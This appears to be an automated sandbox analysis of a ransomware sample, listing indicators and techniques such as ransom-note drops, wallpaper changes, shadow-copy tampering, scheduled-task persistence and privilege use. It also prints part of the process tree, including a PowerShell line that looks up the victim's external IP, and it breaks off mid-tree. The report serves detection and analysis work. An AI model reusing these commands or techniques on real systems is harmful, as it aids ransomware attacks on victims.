File opened (read-only)	\??\S:	eF1cYkHq64.exe
File opened (read-only)	\??\N:	eF1cYkHq64.exe
File opened (read-only)	\??\Y:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\U:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\L:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\H:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\G:	eF1cYkHq64.exe
File opened (read-only)	\??\M:	eF1cYkHq64.exe
File opened (read-only)	\??\Z:	eF1cYkHq64.exe
File opened (read-only)	\??\Z:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\V:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\S:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\R:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\Q:	eF1cYkHq64.exe
File opened (read-only)	\??\Y:	eF1cYkHq64.exe
File opened (read-only)	\??\U:	eF1cYkHq64.exe
File opened (read-only)	\??\V:	eF1cYkHq64.exe
File opened (read-only)	\??\Q:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\E:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\B:	eF1cYkHq64.exe
File opened (read-only)	\??\I:	eF1cYkHq64.exe
File opened (read-only)	\??\K:	eF1cYkHq64.exe
File opened (read-only)	\??\T:	eF1cYkHq64.exe
File opened (read-only)	\??\W:	eF1cYkHq64.exe
File opened (read-only)	\??\X:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\P:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\I:	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened (read-only)	\??\H:	eF1cYkHq64.exe
File opened (read-only)	\??\J:	eF1cYkHq64.exe
File opened (read-only)	\??\O:	eF1cYkHq64.exe
File opened (read-only)	\??\R:	eF1cYkHq64.exe
File opened (read-only)	\??\X:	eF1cYkHq64.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
134	myexternalip.com

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\oi0bl8T8.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\Locales\zh-TW.pak	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Review_RHP.aapp	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\nl-nl\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\delete.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-fr\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Resources\1033\msmdsrvi.rll	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX64\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql2000.xsl	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\it-it\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_18.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\ja-jp\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\deploy\messages_fr.properties	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected]	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointR_OEM_Perp-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\7-Zip\Lang\uz-cyrl.txt	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PublisherVL_KMS_Client-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Javascripts\JSByteCodeWin.bin	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\uss-search\js\nls\pl-pl\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\kk\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PROOF\MSHY7ES.LEX	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\WINWORD.VisualElementsManifest.xml	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\css\main.css	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\THMBNAIL.PNG	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\editvideoimage.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\sl-si\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\zh-tw\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview2x.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jdk-1.8\jre\lib\security\javaws.policy	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected]	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\reviewers.gif	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\example_icons.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileAcrobatCard_Dark.pdf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\LogoCanary.png	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\VBA7.1\1033\VBHW6.CHM	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\js\nls\ru-ru\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\sk-sk\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\next-arrow-down.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\AFTRNOON.ELM	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\VisioProR_Retail2-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN086.XML	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ca-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_KMS_Client-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\Fonts\private\ARIALNB.TTF	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_replace_signer_18.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\nls\cs-cz\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\eu-es\ui-strings.js	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019R_Retail-ul-oob.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\Personal2019R_OEM_Perp-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\PowerPointVL_MAK-pl.xrm-ms	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_remove_18.svg	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Microsoft Office\root\rsod\osm.x-none.msi.16.x-none.tree.dat	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\fr-ma\#CORE_README#.rtf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files\Java\jre-1.8\lib\ext\meta-index	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\IDTemplates\ENU\DefaultID.pdf	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 21 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eF1cYkHq.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wscript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	NWmModN1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
8388	vssadmin.exe
4956	vssadmin.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
8128	schtasks.exe

Suspicious behavior: EnumeratesProcesses 16 IoCs

pid	Process
2204	powershell.exe
2204	powershell.exe
2204	powershell.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
5100	eF1cYkHq64.exe
7164	powershell.exe
7164	powershell.exe
7164	powershell.exe
7164	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
5100	eF1cYkHq64.exe

Suspicious use of AdjustPrivilegeToken 50 IoCs

description	pid	Process
Token: SeDebugPrivilege	2204	powershell.exe
Token: SeTakeOwnershipPrivilege	7496	takeown.exe
Token: SeDebugPrivilege	5100	eF1cYkHq64.exe
Token: SeLoadDriverPrivilege	5100	eF1cYkHq64.exe
Token: SeBackupPrivilege	7216	vssvc.exe
Token: SeRestorePrivilege	7216	vssvc.exe
Token: SeAuditPrivilege	7216	vssvc.exe
Token: SeIncreaseQuotaPrivilege	1600	WMIC.exe
Token: SeSecurityPrivilege	1600	WMIC.exe
Token: SeTakeOwnershipPrivilege	1600	WMIC.exe
Token: SeLoadDriverPrivilege	1600	WMIC.exe
Token: SeSystemProfilePrivilege	1600	WMIC.exe
Token: SeSystemtimePrivilege	1600	WMIC.exe
Token: SeProfSingleProcessPrivilege	1600	WMIC.exe
Token: SeIncBasePriorityPrivilege	1600	WMIC.exe
Token: SeCreatePagefilePrivilege	1600	WMIC.exe
Token: SeBackupPrivilege	1600	WMIC.exe
Token: SeRestorePrivilege	1600	WMIC.exe
Token: SeShutdownPrivilege	1600	WMIC.exe
Token: SeDebugPrivilege	1600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1600	WMIC.exe
Token: SeRemoteShutdownPrivilege	1600	WMIC.exe
Token: SeUndockPrivilege	1600	WMIC.exe
Token: SeManageVolumePrivilege	1600	WMIC.exe
Token: 33	1600	WMIC.exe
Token: 34	1600	WMIC.exe
Token: 35	1600	WMIC.exe
Token: 36	1600	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1600	WMIC.exe
Token: SeSecurityPrivilege	1600	WMIC.exe
Token: SeTakeOwnershipPrivilege	1600	WMIC.exe
Token: SeLoadDriverPrivilege	1600	WMIC.exe
Token: SeSystemProfilePrivilege	1600	WMIC.exe
Token: SeSystemtimePrivilege	1600	WMIC.exe
Token: SeProfSingleProcessPrivilege	1600	WMIC.exe
Token: SeIncBasePriorityPrivilege	1600	WMIC.exe
Token: SeCreatePagefilePrivilege	1600	WMIC.exe
Token: SeBackupPrivilege	1600	WMIC.exe
Token: SeRestorePrivilege	1600	WMIC.exe
Token: SeShutdownPrivilege	1600	WMIC.exe
Token: SeDebugPrivilege	1600	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1600	WMIC.exe
Token: SeRemoteShutdownPrivilege	1600	WMIC.exe
Token: SeUndockPrivilege	1600	WMIC.exe
Token: SeManageVolumePrivilege	1600	WMIC.exe
Token: 33	1600	WMIC.exe
Token: 34	1600	WMIC.exe
Token: 35	1600	WMIC.exe
Token: 36	1600	WMIC.exe
Token: SeDebugPrivilege	7164	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 204 wrote to memory of 1392	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	75
PID 204 wrote to memory of 1392	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	75
PID 204 wrote to memory of 1392	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	75
PID 204 wrote to memory of 4920	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	77
PID 204 wrote to memory of 4920	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	77
PID 204 wrote to memory of 4920	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	77
PID 204 wrote to memory of 1280	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	79
PID 204 wrote to memory of 1280	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	79
PID 204 wrote to memory of 1280	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	79
PID 1280 wrote to memory of 2204	1280	cmd.exe	81
PID 1280 wrote to memory of 2204	1280	cmd.exe	81
PID 1280 wrote to memory of 2204	1280	cmd.exe	81
PID 204 wrote to memory of 1976	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	82
PID 204 wrote to memory of 1976	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	82
PID 204 wrote to memory of 1976	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	82
PID 204 wrote to memory of 3480	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	83
PID 204 wrote to memory of 3480	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	83
PID 204 wrote to memory of 3480	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	83
PID 1976 wrote to memory of 3492	1976	cmd.exe	86
PID 1976 wrote to memory of 3492	1976	cmd.exe	86
PID 1976 wrote to memory of 3492	1976	cmd.exe	86
PID 3480 wrote to memory of 5048	3480	cmd.exe	87
PID 3480 wrote to memory of 5048	3480	cmd.exe	87
PID 3480 wrote to memory of 5048	3480	cmd.exe	87
PID 1976 wrote to memory of 4092	1976	cmd.exe	88
PID 1976 wrote to memory of 4092	1976	cmd.exe	88
PID 1976 wrote to memory of 4092	1976	cmd.exe	88
PID 5048 wrote to memory of 5620	5048	wscript.exe	89
PID 5048 wrote to memory of 5620	5048	wscript.exe	89
PID 5048 wrote to memory of 5620	5048	wscript.exe	89
PID 204 wrote to memory of 5948	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	91
PID 204 wrote to memory of 5948	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	91
PID 204 wrote to memory of 5948	204	6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe	91
PID 1976 wrote to memory of 5856	1976	cmd.exe	92
PID 1976 wrote to memory of 5856	1976	cmd.exe	92
PID 1976 wrote to memory of 5856	1976	cmd.exe	92
PID 5620 wrote to memory of 8128	5620	cmd.exe	95
PID 5620 wrote to memory of 8128	5620	cmd.exe	95
PID 5620 wrote to memory of 8128	5620	cmd.exe	95
PID 5948 wrote to memory of 5928	5948	cmd.exe	96
PID 5948 wrote to memory of 5928	5948	cmd.exe	96
PID 5948 wrote to memory of 5928	5948	cmd.exe	96
PID 5048 wrote to memory of 5852	5048	wscript.exe	97
PID 5048 wrote to memory of 5852	5048	wscript.exe	97
PID 5048 wrote to memory of 5852	5048	wscript.exe	97
PID 5852 wrote to memory of 6564	5852	cmd.exe	99
PID 5852 wrote to memory of 6564	5852	cmd.exe	99
PID 5852 wrote to memory of 6564	5852	cmd.exe	99
PID 5948 wrote to memory of 8076	5948	cmd.exe	100
PID 5948 wrote to memory of 8076	5948	cmd.exe	100
PID 5948 wrote to memory of 8076	5948	cmd.exe	100
PID 5948 wrote to memory of 7496	5948	cmd.exe	103
PID 5948 wrote to memory of 7496	5948	cmd.exe	103
PID 5948 wrote to memory of 7496	5948	cmd.exe	103
PID 5948 wrote to memory of 5192	5948	cmd.exe	104
PID 5948 wrote to memory of 5192	5948	cmd.exe	104
PID 5948 wrote to memory of 5192	5948	cmd.exe	104
PID 5192 wrote to memory of 7952	5192	cmd.exe	105
PID 5192 wrote to memory of 7952	5192	cmd.exe	105
PID 5192 wrote to memory of 7952	5192	cmd.exe	105
PID 7952 wrote to memory of 5100	7952	eF1cYkHq.exe	106
PID 7952 wrote to memory of 5100	7952	eF1cYkHq.exe	106
PID 5812 wrote to memory of 8388	5812	cmd.exe	107
PID 5812 wrote to memory of 8388	5812	cmd.exe	107

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
5928	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe"
1⤵
- Matrix Ransomware
- Enumerates connected drives
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:204
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmModN1.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1392
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmModN1.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWmModN1.exe" -n
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:4920
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\OFi6rG8R.txt"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1280
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2204
- C:\Windows\SysWOW64\cmd.exe
